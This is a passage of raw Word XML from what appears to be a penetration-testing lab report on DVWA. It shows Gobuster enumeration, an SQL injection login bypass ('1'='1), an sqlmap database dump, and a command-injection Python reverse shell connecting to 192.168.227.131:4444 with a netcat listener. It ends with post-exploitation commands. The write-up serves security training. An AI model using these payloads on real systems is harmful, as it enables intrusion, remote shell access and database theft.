                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="716B4FE6" w14:textId="736F3BE2"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Then, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F16CB9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F16CB9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> was used to conduct directory enumeration to determine the web application endpoints and administrative interfaces that can be accessed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B4534C" w14:textId="77777777" w:rsidR="007864B5" w:rsidRDefault="007864B5">
      <w:pP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3CE52D9B" w14:textId="3CAC3D31"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lastRenderedPageBreak/>
        <w:t>Command Execution</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F13614F"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gobuster</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dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> -u http://192.168.227.128 -w /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>/share/wordlists/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>dirb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>/common.txt -t 50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC2425C" w14:textId="77777777" w:rsidR="007864B5" w:rsidRPr="00A000BA" w:rsidRDefault="007864B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065901B7" w14:textId="4EAE97C1" w:rsidR="00335216" w:rsidRDefault="00335216" w:rsidP="004F0197">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00335216">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B00B1BD" wp14:editId="0676B1F1">
            <wp:extent cx="5943600" cy="3125470"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="458905589" name="Picture 1">
              <a:extLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDA9DB5D-526A-4301-923F-46D299E104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05589" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3125470"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="518EF2FC" w14:textId="664B07F7"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5.1.2 SQL Injection Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740C8D4D" w14:textId="378B433E" w:rsidR="00A000BA" w:rsidRPr="009B17B1" w:rsidRDefault="00F16CB9" w:rsidP="004F0197">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="yellow"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F16CB9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Technical analysis of the DVWA application indicated that the application is vulnerable to SQL injection attacks in authentication. SQL injection testing was performed manually and it was established that there were exploitable injection points that allowed bypassing authentication and enumerating the database [23].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2095C86C" w14:textId="10E2DC59"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b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability Assessment: </w:t>
      </w:r>
      <w:r w:rsidRPr="00F16CB9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">The vulnerable parameter accepted user input without </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F16CB9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>parameterisation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F16CB9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> or input validation and the input was implicitly placed into SQL statements, allowing arbitrary execution of SQL commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D369E0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Exploitation Procedure</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2359D86D" w14:textId="655F2471"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 OR '1'='1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356C36C6" w14:textId="77777777" w:rsidR="00F16CB9"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Using this payload, the authentication logic was bypassed by modifying the SQL query to always check true which provided unauthorised administrative access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D154C7C" w14:textId="3CFF9E64" w:rsidR="005D1B03" w:rsidRDefault="005D1B03"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5D1B03">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="689344F0" wp14:editId="26C18B25">
            <wp:extent cx="5943600" cy="3131185"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="413674289" name="Picture 1">
              <a:extLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B0906E3-9D44-46AE-A55F-63C7530EC9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74289" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3131185"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7B755C" w14:textId="6A03C123"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Advanced enumeration </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>utilised</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SQLmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> for automated database extraction:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A521BDF"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0B03FE80" w14:textId="56F7D86D" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA"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sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> -u</w:t>
      </w:r>
      <w:r w:rsidR="007864B5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>"http://192.168.227.128/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit#" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334728BA" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA"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--cookie="PHPSESSID=&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>session_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>&gt;; security=low" --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>dbs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="06DC68E9" w14:textId="77777777" w:rsidR="00572A20" w:rsidRDefault="00572A20" w:rsidP="004F0197">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00572A20">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6ED40BB5" wp14:editId="524FEC58">
            <wp:extent cx="5943600" cy="3007995"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="1186155015" name="Picture 1">
              <a:extLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D75FA34B-CC95-405B-9FA1-295D3815C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55015" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3007995"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="73909E85" w14:textId="77777777" w:rsidR="00236891" w:rsidRDefault="00236891"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49F29134" w14:textId="568F704A"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14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>5.1.3 Remote Code Execution via Command Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B95C24"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The command injection vulnerability within DVWA permitted arbitrary operating system command execution through </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>unsanitised</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> shell command concatenation [24].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5710D2A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Exploitation Payload</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73EF594D" w14:textId="77777777" w:rsidR="006218ED" w:rsidRPr="006218ED" w:rsidRDefault="006218ED"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6218ED">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6D4693" w14:textId="4041C699" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="006218ED"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6218ED">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>127.0.0.1; python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.227.131",4444));os.dup2(s.fileno(),0); os.dup2(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006218ED">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>s.fileno</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006218ED">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>(),1); os.dup2(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006218ED">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>s.fileno</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006218ED">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>(),2);p=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006218ED">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>subprocess.call</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006218ED">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>(["/bin/bash","-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006218ED">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006218ED">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>"]);'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A39584E"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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> listener established on attacking machine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FD9F8C"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lvnp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D78699B" w14:textId="1D4220BD" w:rsidR="006218ED" w:rsidRDefault="006218ED" w:rsidP="004F0197">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79DCE1EC" wp14:editId="29D40642">
            <wp:extent cx="5943600" cy="3129280"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1836831559" name="Picture 1">
              <a:extLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{333C7FA1-FAB1-4091-AC29-B1D950CEB0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31559" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3129280"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA12DC3" w14:textId="77777777" w:rsidR="00236891" w:rsidRDefault="00236891" w:rsidP="004F0197">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63B0A767" w14:textId="68C172A6" w:rsidR="006218ED" w:rsidRPr="00A000BA" w:rsidRDefault="009E658F"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9E658F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="605846E9" wp14:editId="78FFDBD8">
            <wp:extent cx="5943600" cy="887095"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="288047787" name="Picture 1">
              <a:extLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31F51417-692F-4B4D-A3D4-F04BA2F2E6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47787" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="887095"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D49BC4E" w14:textId="77777777" w:rsidR="00236891" w:rsidRDefault="00236891"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60C5BDF7" w14:textId="0E1E5905"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lastRenderedPageBreak/>
        <w:t>Post-Exploitation Enumeration</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1584A0"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id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8DA412"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uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> -a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDC3E5A"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cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
